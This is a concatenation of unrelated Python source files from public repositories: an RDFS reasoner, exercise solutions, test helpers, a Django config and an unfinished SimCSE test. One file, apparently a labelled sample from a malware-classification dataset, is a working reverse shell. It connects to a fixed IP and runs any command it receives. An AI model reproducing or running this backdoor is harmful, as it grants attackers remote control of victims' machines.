ed2fdb1bb003f7c36e88a99e59dff4ea2d85a2af | 42ea9b76bfbf4d609f655d897082fb3f46bf4058 | /src/minimalkb/services/simple_rdfs_reasoner.py | f9a108d6c2e04bd7809837b58efbe8129461d309 | [
"BSD-3-Clause"
] | permissive | chili-epfl/minimalkb | a9ffe957caa8fd24645117e7afbc97b7406c3048 | 25d90d90dc9e8dbf41ba18bf522a80eeb6520dbb | refs/heads/master | 2021-05-20T17:37:52.403932 | 2021-02-25T09:30:09 | 2021-02-25T09:30:09 | 13,498,236 | 4 | 1 | BSD-3-Clause | 2021-02-25T02:39:50 | 2013-10-11T12:21:29 | Python | UTF-8 | Python | false | false | 7,032 | py | import logging; logger = logging.getLogger("minimalKB."+__name__);
DEBUG_LEVEL=logging.DEBUG
import time
import datetime
import sqlite3
from minimalkb.backends.sqlite import sqlhash
from minimalkb.kb import DEFAULT_MODEL
REASONER_RATE = 5 #Hz
class OntoClass:
def __init__(self, name):
self.name = name
self.parents = set()
self.children = set()
self.instances = set()
self.equivalents = set()
def __repr__(self):
return self.name + \
"\n\tParents: " + str(self.parents) + \
"\n\tChildren: " + str(self.children) + \
"\n\tInstances: " + str(self.instances)
class SQLiteSimpleRDFSReasoner:
SYMMETRIC_PREDICATES = {"owl:differentFrom", "owl:sameAs", "owl:disjointWith"}
def __init__(self, database = "kb.db"):
self.db = sqlite3.connect(':memory:') # create a memory database
self.shareddb = sqlite3.connect(database)
# create the tables
# taken from http://stackoverflow.com/questions/4019081
query = None
for line in self.shareddb.iterdump():
if "triples" in line:
query = line
break
self.db.executescript(query)
self.running = True
logger.info("Reasoner (simple RDFS) started. Classification running at %sHz" % REASONER_RATE)
####################################################################
####################################################################
def classify(self):
starttime = time.time()
self.copydb()
models = self.get_models()
newstmts = []
for model in models:
rdftype, subclassof = self.get_missing_taxonomy_stmts(model)
newstmts += [(i, "rdf:type", c, model) for i,c in rdftype]
newstmts += [(cc, "rdfs:subClassOf", cp, model) for cc,cp in subclassof]
newstmts += self.symmetric_statements(model)
if newstmts:
logger.debug("Reasoner added new statements to the knowledge base:\n -" +\
"\n - ".join(["%s %s %s (in %s)" % stmt for stmt in newstmts]))
self.update_shared_db(newstmts)
logger.info("Classification took %fsec." % (time.time() - starttime))
def get_models(self):
with self.db:
return [row[0] for row in self.db.execute("SELECT DISTINCT model FROM triples")]
def get_onto(self, db, model = DEFAULT_MODEL):
onto = {}
rdftype = None
subclassof = None
equivalentclasses = None
with db:
rdftype = {(row[0], row[1]) for row in db.execute(
'''SELECT subject, object FROM triples
WHERE (predicate='rdf:type' AND model=?)
''', [model])}
subclassof = {(row[0], row[1]) for row in db.execute(
'''SELECT subject, object FROM triples
WHERE (predicate='rdfs:subClassOf' AND model=?)
''', [model])}
equivalentclasses = {(row[0], row[1]) for row in db.execute(
'''SELECT subject, object FROM triples
WHERE (predicate='owl:equivalentClass' AND model=?)
''', [model])}
for cc, cp in subclassof:
parent = onto.setdefault(cp, OntoClass(cp))
child = onto.setdefault(cc, OntoClass(cc))
child.parents.add(parent)
parent.children.add(child)
for i, c in rdftype:
onto.setdefault(c, OntoClass(c)).instances.add(i)
for ec1, ec2 in equivalentclasses:
equi1 = onto.setdefault(ec1, OntoClass(ec1))
equi2 = onto.setdefault(ec2, OntoClass(ec2))
equi1.equivalents.add(equi2)
equi2.equivalents.add(equi1)
return onto, rdftype, subclassof
def get_missing_taxonomy_stmts(self, model = DEFAULT_MODEL):
onto, rdftype, subclassof = self.get_onto(self.db, model)
newrdftype = set()
newsubclassof = set()
def addinstance(instance, cls):
newrdftype.add((instance, cls.name))
for p in cls.parents:
addinstance(instance, p)
def addsubclassof(scls, cls):
newsubclassof.add((scls.name, cls.name))
for p in cls.parents:
addsubclassof(scls, p)
for name, cls in onto.items():
for i in cls.instances:
addinstance(i, cls)
for p in cls.parents:
addsubclassof(cls, p)
for equivalent in cls.equivalents:
for i in cls.instances:
addinstance(i, equivalent)
for p in cls.parents:
addsubclassof(equivalent, p)
newrdftype -= rdftype
newsubclassof -= subclassof
return newrdftype, newsubclassof
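    # Illustration of what get_missing_taxonomy_stmts() infers (added comment, hypothetical triples):
    # given <bottle rdf:type Bottle>, <Bottle rdfs:subClassOf Container> and
    # <Container rdfs:subClassOf Object>, it returns ({(bottle, Container), (bottle, Object)},
    # {(Bottle, Object)}) -- the transitive closure minus the statements already asserted.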
def symmetric_statements(self, model):
with self.db:
stmts = {(row[0], row[1], row[2], model) for row in self.db.execute(
'''SELECT subject, predicate, object FROM triples
WHERE (predicate IN ('%s') AND model=?)
''' % "', '".join(self.SYMMETRIC_PREDICATES), [model])}
return {(o, p, s, m) for s, p, o, m in stmts} - stmts # so we keep only the new symmetrical statements
######################################################################
######################################################################
def copydb(self):
""" Tried several other options (with ATTACH DATABASE -> that would likely lock the shared database as well, with iterdump, we miss the 'OR IGNORE')
"""
res = self.shareddb.execute("SELECT * FROM triples")
with self.db:
self.db.execute("DELETE FROM triples")
self.db.executemany('''INSERT INTO triples
VALUES (?, ?, ?, ?, ?, ?, ?, ?)''',
res)
def update_shared_db(self, stmts):
logger.debug("Reasoner added %s new statements: %s" % (len(stmts), stmts))
timestamp = datetime.datetime.now().isoformat()
stmts = [[sqlhash(s,p,o,model), s, p, o, model, timestamp] for s,p,o,model in stmts]
with self.shareddb:
self.shareddb.executemany('''INSERT OR IGNORE INTO triples
(hash, subject, predicate, object, model, timestamp, inferred)
VALUES (?, ?, ?, ?, ?, ?, 1)''', stmts)
def __call__(self, *args):
try:
while self.running:
time.sleep(1./REASONER_RATE)
self.classify()
except KeyboardInterrupt:
return
reasoner = None
def start_reasoner(db):
global reasoner
if not reasoner:
reasoner = SQLiteSimpleRDFSReasoner()
reasoner.running = True
reasoner()
def stop_reasoner():
if reasoner:
reasoner.running = False
| [
"[email protected]"
] | |
ca558fb7c1542d8a31c2201706ddd1b15d043e8c | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/series/4b461e5da45242b5971e42844d148b42.py | 99ea386f4fc3f7410b9f7ea347e65477581b406a | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 583 | py | def slices(digits, length_of_series):
is_series_longer_than_digits = length_of_series > len(digits)
is_series_less_than_1 = length_of_series < 1
if is_series_longer_than_digits: raise ValueError
if is_series_less_than_1: raise ValueError
def remove_first_element(L):
L.pop(0)
series = []
number_of_series = (len(digits) - length_of_series) + 1
digits = list(map(int, digits))
for _ in range(number_of_series):
series.append(digits[0:length_of_series])
remove_first_element(digits)
return series
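# Illustrative comment (added): slices("01234", 2) -> [[0, 1], [1, 2], [2, 3], [3, 4]];
# slices("012", 4) raises ValueError because the requested length exceeds the input.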
| [
"[email protected]"
] | |
f12654076d1f91eff74e060ecf6c9c3b0487d989 | ac216a2cc36f91625e440247986ead2cd8cce350 | /appengine/predator/analysis/analysis_testcase.py | 2c001a931cc3aba51f1d550a485ba1f8e897dd97 | [
"BSD-3-Clause"
] | permissive | xinghun61/infra | b77cdc566d9a63c5d97f9e30e8d589982b1678ab | b5d4783f99461438ca9e6a477535617fadab6ba3 | refs/heads/master | 2023-01-12T21:36:49.360274 | 2019-10-01T18:09:22 | 2019-10-01T18:09:22 | 212,168,656 | 2 | 1 | BSD-3-Clause | 2023-01-07T10:18:03 | 2019-10-01T18:22:44 | Python | UTF-8 | Python | false | false | 5,668 | py | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
from libs.base_testcase import BaseTestCase
from libs.gitiles.change_log import ChangeLog
from analysis.type_enums import CrashClient
DUMMY_CHANGELOG = ChangeLog.FromDict({
'author': {
'name': '[email protected]',
'email': '[email protected]',
'time': 'Thu Mar 31 21:24:43 2016',
},
'committer': {
'name': '[email protected]',
'email': '[email protected]',
'time': 'Thu Mar 31 21:28:39 2016',
},
'message': 'dummy',
'commit_position': 175900,
'touched_files': [
{
'change_type': 'add',
'new_path': 'a.cc',
'old_path': None,
},
{
'change_type': 'rename',
'old_path': 'old_name.cc',
'new_path': 'new_name.cc',
},
],
'commit_url':
'https://repo.test/+/1',
'code_review_url': 'https://codereview.chromium.org/3281',
'revision': '1',
'reverted_revision': None
})
class MockLog(object): # pragma: no cover
def __init__(self):
self.logs = []
def Log(self, name, message, level):
self.logs.append({'name': name, 'message': message, 'level': level})
class AnalysisTestCase(BaseTestCase): # pragma: no cover.
def _VerifyTwoStackFramesEqual(self, frame1, frame2):
self.assertIsNotNone(frame1, "the first frame is unexpectedly missing")
self.assertIsNotNone(frame2, "the second frame is unexpectedly missing")
self.assertEqual(str(frame1), str(frame2))
self.assertEqual(frame1.dep_path, frame2.dep_path)
def _VerifyTwoCallStacksEqual(self, stack1, stack2):
self.assertIsNotNone(stack1, "the first stack is unexpectedly missing")
self.assertIsNotNone(stack2, "the second stack is unexpectedly missing")
self.assertEqual(len(stack1.frames), len(stack2.frames))
self.assertEqual(stack1.priority, stack2.priority)
self.assertEqual(stack1.format_type, stack2.format_type)
self.assertEqual(stack1.language_type, stack2.language_type)
map(self._VerifyTwoStackFramesEqual, stack1.frames, stack2.frames)
def _VerifyTwoStacktracesEqual(self, trace1, trace2):
self.assertIsNotNone(trace1, "the first trace is unexpectedly missing")
self.assertIsNotNone(trace2, "the second trace is unexpectedly missing")
self.assertEqual(len(trace1.stacks), len(trace2.stacks))
map(self._VerifyTwoCallStacksEqual, trace1.stacks, trace2.stacks)
def GetDummyChangeLog(self):
return copy.deepcopy(DUMMY_CHANGELOG)
def GetDummyClusterfuzzData(
self, client_id=CrashClient.CLUSTERFUZZ, version='1',
signature='signature', platform='win', stack_trace=None,
regression_range=None, testcase_id='213412343',
crash_type='check', crash_address='0x0023',
job_type='android_asan', sanitizer='ASAN', dependencies=None,
dependency_rolls=None, redo=False, security_flag=False):
crash_identifiers = {'testcase_id': testcase_id}
regression_range = regression_range or {
'dep_path': 'src',
'repo_url': 'https://chromium.git',
'old_revision': '3',
'new_revision': '9',
}
customized_data = {
'crash_type': crash_type,
'crash_address': crash_address,
'job_type': job_type,
'sanitizer': sanitizer,
'regression_range': regression_range,
'dependencies': dependencies or [{'dep_path': 'src/',
'repo_url': 'https://repo',
'revision': 'rev'}],
'dependency_rolls': dependency_rolls or [{'dep_path': 'src/',
'repo_url': 'https://repo',
'old_revision': 'rev1',
'new_revision': 'rev5'}],
'testcase_id': testcase_id,
'security_flag': security_flag,
}
crash_data = {
'crash_revision': version,
'signature': signature,
'platform': platform,
'stack_trace': stack_trace,
'regression_range': regression_range,
'crash_identifiers': crash_identifiers,
'customized_data': customized_data
}
if redo:
crash_data['redo'] = True
# This insertion of client_id is used for debugging ScheduleNewAnalysis.
if client_id is not None: # pragma: no cover
crash_data['client_id'] = client_id
return crash_data
def GetDummyChromeCrashData(
self, client_id=CrashClient.CRACAS, version='1', signature='signature',
platform='win', stack_trace=None, regression_range=None, channel='canary',
historical_metadata=None, process_type='browser'):
crash_identifiers = {
'chrome_version': version,
'signature': signature,
'channel': channel,
'platform': platform,
'process_type': process_type,
}
customized_data = {
'historical_metadata': historical_metadata,
'channel': channel,
}
crash_data = {
'chrome_version': version,
'signature': signature,
'platform': platform,
'stack_trace': stack_trace,
'regression_range': regression_range,
'crash_identifiers': crash_identifiers,
'customized_data': customized_data
}
# This insertion of client_id is used for debugging ScheduleNewAnalysis.
if client_id is not None: # pragma: no cover
crash_data['client_id'] = client_id
return crash_data
def GetMockLog(self):
return MockLog()
| [
"[email protected]"
] | |
baaf2f9367b44c93bdb2ea25862bb10a4d3d14a2 | 15ce00a910f5404f1ab3d6eb59334c26c5708748 | /functions/keyword_only.py | cbbca0266fc6ae00ec778c065a99907bc58b6732 | [] | no_license | calazans10/algorithms.py | 3307be25920428b33e784229c2aa727ac4225423 | b8b0495fe34645b45aa5366416c1f80d87d18a3b | refs/heads/master | 2020-05-17T13:27:58.481732 | 2013-07-21T13:31:39 | 2013-07-21T13:31:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | py | # -*- coding: utf-8 -*-
def total(initial=5, *numbers, vegetables):
count = initial
for number in numbers:
count += number
count += vegetables
return count
print(total(10, 1, 2, 3, vegetables=50))
print(total(10, 1, 2, 3, vegetables=10))
| [
"[email protected]"
] | |
4db681565b71e2d02636d8c2ff90e16398465c69 | 401ea01ffb848f1eabd8aa17690ec1ff5dc8e6bd | /test/test_self_user.py | 6ef6283a00a67b2ebbd837e2bb6a9c8afd01890c | [] | no_license | bbrangeo/python-api-client | 735acda3627d7a0ddd78ecb1e9617bb4082c9001 | c2481e0cd012a41aeceefdce289d48509540b909 | refs/heads/master | 2020-03-14T18:24:20.888631 | 2018-04-30T14:47:47 | 2018-04-30T14:47:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 849 | py | # coding: utf-8
"""
BIMData API
BIMData API documentation # noqa: E501
OpenAPI spec version: v1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import bimdata_api_client
from bimdata_api_client.models.self_user import SelfUser # noqa: E501
from bimdata_api_client.rest import ApiException
class TestSelfUser(unittest.TestCase):
"""SelfUser unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testSelfUser(self):
"""Test SelfUser"""
# FIXME: construct object with mandatory attributes with example values
# model = bimdata_api_client.models.self_user.SelfUser() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
366a391f8c2df41752f3272eb3d7db8337b7d0fe | e3840576e475c42160e914487ba91c1defc0b42f | /abc_155_D.py | 8b0cb0d8037837a3e05322550b9f2afb2c20e146 | [] | no_license | Kuroboo100/atcoder | 35f92e1a6001430bd96535799594573add78f5db | 280562ef3f963b24f79b56204ba5a1b35ce84b69 | refs/heads/master | 2022-11-25T13:17:02.280672 | 2020-08-03T13:36:40 | 2020-08-03T13:36:40 | 269,625,592 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,146 | py | def mul_minus(m,p,k):
"""
    m, p = the "minus" and "plus" lists; pass them in the order minus >> plus.
    Output: the k-th smallest number among the products of pairs drawn from the two lists.
"""
p.sort(reverse=True)
m_tmp=0
p_tmp=0
i=0
mul=[m[0]*p[0]]
while i<k:
if p_tmp+1<len(p):
can_1=m[m_tmp]*p[p_tmp+1]
if m_tmp+1<len(m):
can_2=m[m_tmp+1]*p[p_tmp]
if can_1>=can_2:
m_tmp=m_tmp+1
else:
p_tmp=p_tmp+1
mul.append(m[m_tmp]*p[p_tmp])
i+=1
return m[m_tmp]*p[p_tmp]
def mul_plus(m,p,k):
"""
    m, p = the "minus" and "plus" lists; pass them in the order minus >> plus.
    Output: the k-th smallest number among the products of pairs drawn from the two lists.
"""
    m.sort(reverse=True)
tmp=[0,1,0,1]
sm_tmp=tmp[0]
lm_tmp=tmp[1]
sp_tmp=tmp[2]
lp_tmp=tmp[3]
i=0
can=[0,0,0,0]
mul=[]
while i<k:
if sm_tmp+1!=lm_tmp and sm_tmp+1<len(m):
can[0]=m[sm_tmp+1]*m[lm_tmp]
if lm_tmp+1<len(m):
can[1]=m[sm_tmp]*m[lm_tmp+1]
if sp_tmp+1!=lp_tmp and sp_tmp+1<len(p):
can[2]=p[sp_tmp+1]*p[lp_tmp]
if lp_tmp+1<len(p):
can[3]=p[sp_tmp]*p[lp_tmp+1]
j=can.index(min(can))
tmp[j]+=1
i+=1
mul.append(min(can))
return min(can)
def main():
N,K=map(int,input().strip().split())
A=list(map(int,input().strip().split()))
A.sort()
minus=[]
zero=[]
plus=[]
for n in range(N):
if A[n]<0:
minus.append(A[n])
elif A[n]==0:
            zero.append(A[n])
else:
plus.append(A[n])
num_minus=len(minus)*len(plus)
num_zero=len(zero)*len(minus)+len(zero)*len(plus)
num_plus=len(plus)*(len(plus)-1)+len(minus)*(len(minus)-1)
if K<=num_minus:
return mul_minus(minus,plus,K)
elif num_minus<K<=num_minus+num_zero:
return 0
else:
k=K-num_minus-num_zero
return mul_plus(minus,plus,k)
if __name__=="__main__":
print(main())
| [
"[email protected]"
] | |
6729ca87ad8b65a551fd5f41d6443586e13baa15 | 4c9580b2e09e2b000e27a1c9021b12cf2747f56a | /chapter06/chapter06/wsgi.py | 3e88f160f773a7fc27dbdb8429834ad511c1267e | [] | no_license | jzplyy/xiaoyue_mall | 69072c0657a6878a4cf799b8c8218cc7d88c8d12 | 4f9353d6857d1bd7dc54151ca8b34dcb4671b8dc | refs/heads/master | 2023-06-26T02:48:03.103635 | 2021-07-22T15:51:07 | 2021-07-22T15:51:07 | 388,514,311 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | """
WSGI config for chapter06 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'chapter06.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
5d8ebf6a2f375bd1c7c82b768a5185bcd628005f | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/virus/sample_bad356.py | a7091ad0c1ea2d013487c02faa2df366dff3846f | [] | no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | import zlib
import tarfile
import socket
import crypt
import lzma
import subprocess
import gzip
import bz2
import hmac
import hashlib
import threading
import zipfile
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
| [
"[email protected]"
] | |
7b06911905dd515116322f0cffab02dde6d356fd | 3a6d382503e11753dd81b291145847a2eabb8ec6 | /experimental/dsmith/scrapheap/handcheck-crashes.py | 6bd9c728da3084f4cc4cfb8f5c3850d0b9dcd044 | [] | no_license | QuXing9/phd | 7e6f107c20e0b3b1de2b25eb99e0b640a4a0bfcf | 58ba53b6d78515ed555e40527f6923e28941cc19 | refs/heads/master | 2022-02-27T03:29:05.126378 | 2019-10-22T02:46:57 | 2019-10-22T02:46:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,168 | py | #!/usr/bin/env python
import random
import sys
from argparse import ArgumentParser
from dsmith import db
from dsmith.db import *
def yes_no_or_skip(question, default="skip"):
"""Ask a yes/no/skip question via input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
  It must be "yes", "no", "skip" (the default) or None (meaning
  an answer is required of the user).
  The return value is one of the strings "yes", "no" or "skip".
"""
valid = {"yes": "yes", "y": "yes", "ye": "yes",
"no": "no", "n": "no",
"skip": "skip", "ski": "skip", "sk": "skip", "s": "skip", }
if default is None:
prompt = "[y/n/s]"
elif default == "yes":
prompt = "[Y/n/s]"
elif default == "no":
prompt = "[y/N/s]"
elif default == "skip":
prompt = "[y/n/S]"
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(f"{question} {prompt} ")
choice = input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
      sys.stdout.write(f"Invalid input, select from {prompt}.\n")
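# Example (added): yes_no_or_skip("Is this a valid kernel?") keeps prompting until it
# can return one of the strings "yes", "no" or "skip"; a bare Enter picks the default.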
def handcheck(recheck=False, include_all=False):
program = None
with Session() as session:
q = session.query(CLgenProgram).distinct() \
.join(cl_launcherCLgenResult,
cl_launcherCLgenResult.program_id == CLgenProgram.id) \
.filter(CLgenProgram.gpuverified == 1)
if not include_all:
q = q.filter(cl_launcherCLgenResult.status == 0,
cl_launcherCLgenResult.classification == "Wrong code")
if not recheck:
q = q.filter(CLgenProgram.handchecked == None)
num_todo = q.count()
if num_todo:
program = q.limit(1).offset(random.randint(0, num_todo - 1)).first()
print()
print(f"{num_todo} kernels to check")
print("=====================================")
print(program.src)
print()
answer = yes_no_or_skip("Is this a valid kernel?")
if answer == "skip":
print("skip")
else:
valid = answer == "yes"
print(valid)
print()
program.handchecked = 1 if valid else 0
# next check
if program:
handcheck(recheck=recheck, include_all=include_all)
def main():
parser = ArgumentParser(description="Collect difftest results for a device")
parser.add_argument("-H", "--hostname", type=str, default="cc1",
help="MySQL database hostname")
parser.add_argument("-r", "--recheck", action="store_true",
help="include previously checked kernels")
parser.add_argument("-a", "--all", dest="include_all", action="store_true",
help="include all kernels, not just wrong-code")
args = parser.parse_args()
# get testbed information
db_hostname = args.hostname
db_url = db.init(db_hostname)
try:
handcheck(recheck=args.recheck, include_all=args.include_all)
print("done.")
except KeyboardInterrupt:
print("\nthanks for playing")
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
1285800c62612518ff3de3b4bd6c8e0c608033a7 | 43a78f0bcd94f617d2c55e5019f3f3475580165d | /Udemy/Section 14/RunIETests.py | c99fb8fe83ce12a1bd5e1f56a6d79f70c50d2881 | [] | no_license | ctramm/Python_Training | 2c35bd36b7cd1ea6598f915fafcf37ca048cf8ed | a0864a82bd6fb002c5f1a9aa7fb5d0b18341e6b0 | refs/heads/master | 2022-12-04T14:18:30.477562 | 2022-11-12T09:03:25 | 2022-11-12T09:03:25 | 171,736,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | """
Section 14: Run Tests on IE
"""
from selenium import webdriver
class RunIETests:
def test_method(self):
driver = webdriver.Ie()
driver.get("http://www.letskodeit.com")
driver.close()
ie = RunIETests()
ie.test_method()
| [
"[email protected]"
] | |
c03c50aefa8eb8ec66658f37fee45ada353f7ca7 | abad82a1f487c5ff2fb6a84059a665aa178275cb | /Codewars/8kyu/plural/Python/test.py | 94c45c725af33da58916db900b0dd16972a85ea8 | [
"MIT"
] | permissive | RevansChen/online-judge | 8ae55f136739a54f9c9640a967ec931425379507 | ad1b07fee7bd3c49418becccda904e17505f3018 | refs/heads/master | 2021-01-19T23:02:58.273081 | 2019-07-05T09:42:40 | 2019-07-05T09:42:40 | 88,911,035 | 9 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | # Python - 3.6.0
Test.assert_equals(plural(0), True, 'Plural for 0' )
Test.assert_equals(plural(0.5), True, 'Plural for 0.5')
Test.assert_equals(plural(1), False, '1 is singular!')
Test.assert_equals(plural(100), True, 'Plural for 100')
| [
"[email protected]"
] | |
37b2cfa3b1377db9d4b5444701cb38d3915fb1ed | b43103229a5fc3c49285818881eea7c42b8021c2 | /python标准文档例题/真值测试.py | ef253daafb3daa0507df374ce37552f3428e6838 | [] | no_license | AlienWu2019/Alien-s-Code | 34eaf60ae7ada4810c3564cee1a25371c1c3f7ad | 983f68d13a81e6141779d26c84e371b2bf1d2e0d | refs/heads/master | 2020-05-07T18:42:03.723993 | 2019-05-05T14:32:49 | 2019-05-05T14:32:49 | 180,777,724 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | import sys,math
def hash_fraction(m,n):
p=sys.hash_info.modulus
while m%p==n%p==0:
m,n=m//p,n//p
if n%p==0:
hash_value=sys.hash_info.inf
else:
hash_value=(abs(m)%p)*pow(n,p-2,p)%p
if m<0:
hash_value=-hash_value
if hash_value==-1:
hash_value=-2
return hash_value
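# Illustrative check (added; relies on CPython's documented rule that numbers which
# compare equal must hash equal): hash_fraction(1, 2) should match both hash(0.5)
# and hash(fractions.Fraction(1, 2)).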
def hash_float(x):
if math.isnan(x):
return sys.hash_info.nan
elif math.isinf(x):
return sys.hash_info.inf if x>0 else -sys.hash_info.inf
else:
return hash_fraction(*x.as_integer_ratio()) | [
"[email protected]"
] | |
56b651f1e53a535c948b8d7ba66fd0d05f4a02d9 | 060877bd2d5ad6ebb4b303e5dfae47afe9afd4f2 | /mupit/combine_analyses.py | 16e16a2626b9fdec431a1124cf4672d82dabe14d | [
"MIT"
] | permissive | tianyunwang/mupit | f0cc92e1495144d2ea11ab60fbedbce70e6ba5e4 | bca917af1e23b4466f636c6ae29479833c52efae | refs/heads/master | 2020-03-26T04:27:13.342987 | 2018-08-02T23:18:42 | 2018-08-02T23:18:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,886 | py | """
Copyright (c) 2016 Genome Research Ltd.
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import math
import numpy
import pandas
from scipy.stats import chi2
def fishersMethod(x):
""" function to combine p values, using Fisher's method
Args:
x: list of P-values for a gene
Returns:
combined P-value
"""
x = [ val for val in x if not math.isnan(val) ]
if len(x) == 0:
return numpy.nan
return chi2.sf(-2 * sum(numpy.log(x)), 2 * len(x))
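# Worked example (added for illustration): fishersMethod([0.05, 0.05]) computes
# chi2.sf(-2 * (log(0.05) + log(0.05)), 4) = chi2.sf(11.98, 4), which is about 0.017,
# i.e. two marginally significant tests combine into stronger evidence than either alone.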
def combine_enrichment_and_clustering(enriched, clust):
""" combine P values from enrichment and clustering tests into a single P value
Args:
enriched: dataframe of de novo enrichment results
clust: dataframe of de novo clustering results
Returns:
a merged dataset where the P values have been combined
"""
# read in p values from clustering analysis, only for genes with >1 mutation
clust = pandas.pivot_table(clust, index=["gene_id"],
columns=["mutation_category"], values="probability", aggfunc=numpy.mean)
clust["hgnc"] = list(clust.index)
columns = ["missense", "nonsense"]
rename = dict(zip(columns, [ "p_{}_clust".format(x) for x in columns ]))
clust = clust.rename(columns=rename)
# merge the datasets
merged = enriched.merge(clust, how="left", on="hgnc")
# calculate a combined p-value for each gene. We don't expect the
# loss-of-function de novos to be clustered, so we don't use that.
p_values = merged[["p_func", "p_missense_clust"]]
merged["p_combined"] = p_values.apply(fishersMethod, axis=1)
# calculate minimum p value across LoF and func + clustering tests
merged["p_min"] = merged[["p_lof", "p_combined"]].min(axis=1)
return merged
def combine_tests(meta_clust, meta_enrich, clust, enrich, pheno_path=None):
""" find the most significant P value for each gene from the P values from
different subsets and different tests.
Args:
meta_clust: path to clustering results for the meta-analysis subset
meta_enrich: path to enrichment results for the meta-analysis subset
clust: path to clustering results for the ddd only subset
enrich: path to enrichment results for the ddd only subset
pheno_path: path to phenotype similarity testing results
Returns:
data frame with the columns from all the datasets, as well as minimum
P values from each subset for each gene, and overall minimum P values
for each gene.
"""
# load all the data files
clust = pandas.read_table(clust, sep="\t")
enrich = pandas.read_table(enrich, sep="\t")
meta_clust = pandas.read_table(meta_clust, sep="\t")
meta_enrich = pandas.read_table(meta_enrich, sep="\t")
meta = combine_enrichment_and_clustering(meta_enrich, meta_clust)
ddd = combine_enrichment_and_clustering(enrich, clust)
# if we have phenotypic similarity results, merge them with the other results
if pheno_path is not None:
phenotypes = pandas.read_table(pheno_path, sep="\t")
ddd = ddd.merge(phenotypes, how="outer", on="hgnc")
# need names that are more informative as same across files, add prefix
columns = ["lof_indel", "lof_snv", "missense_indel", "missense_snv",
"p_lof", "p_func", "p_missense_clust", "p_nonsense_clust", "gene_id",
"p_combined", "hpo_similarity_p_value", "p_min"]
ddd = ddd.rename(columns=dict(zip(columns, [ "ddd.{}".format(x) for x in columns ])))
meta = meta.rename(columns=dict(zip(columns, [ "meta.{}".format(x) for x in columns ])))
# merge together files, focusing on genes with DNMs in DDD
merged = meta.merge(ddd, how="outer", on=["hgnc", "chrom"])
merged["p_min"] = merged[["ddd.p_min", "meta.p_min"]].min(axis=1)
return merged
| [
"[email protected]"
] | |
74b7e9f0e76db5cc22f02e7a25cb6f5363f8c823 | 2d8113d4fa1560eefb3b9419c9494dfcbf12c2b5 | /tests/simcse_test.py | 320ea5abb3791b150acdb3c3ec2ee0b4cf0a94dd | [
"Apache-2.0"
] | permissive | tiffen/DeepSE | 6bcdcd2d64b8f9cf7643086395b6a2468d13445a | a7c47c5146827d50bc46a8ec30da6ee651a0c6b8 | refs/heads/main | 2023-06-17T12:37:06.947099 | 2021-07-16T03:08:36 | 2021-07-16T03:08:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,921 | py | import os
import unittest
import tensorflow as tf
from deepse.simcse import SimCSE
from deepse.simcse_dataset import (HardNegativeSimCSEDataset,
SupervisedSimCSEDataset, UnsupSimCSEDataset)
from tokenizers import BertWordPieceTokenizer
PRETRAINED_MODEL_PATH = os.environ['PRETRAINED_MODEL_PATH']
class SimCSETest(unittest.TestCase):
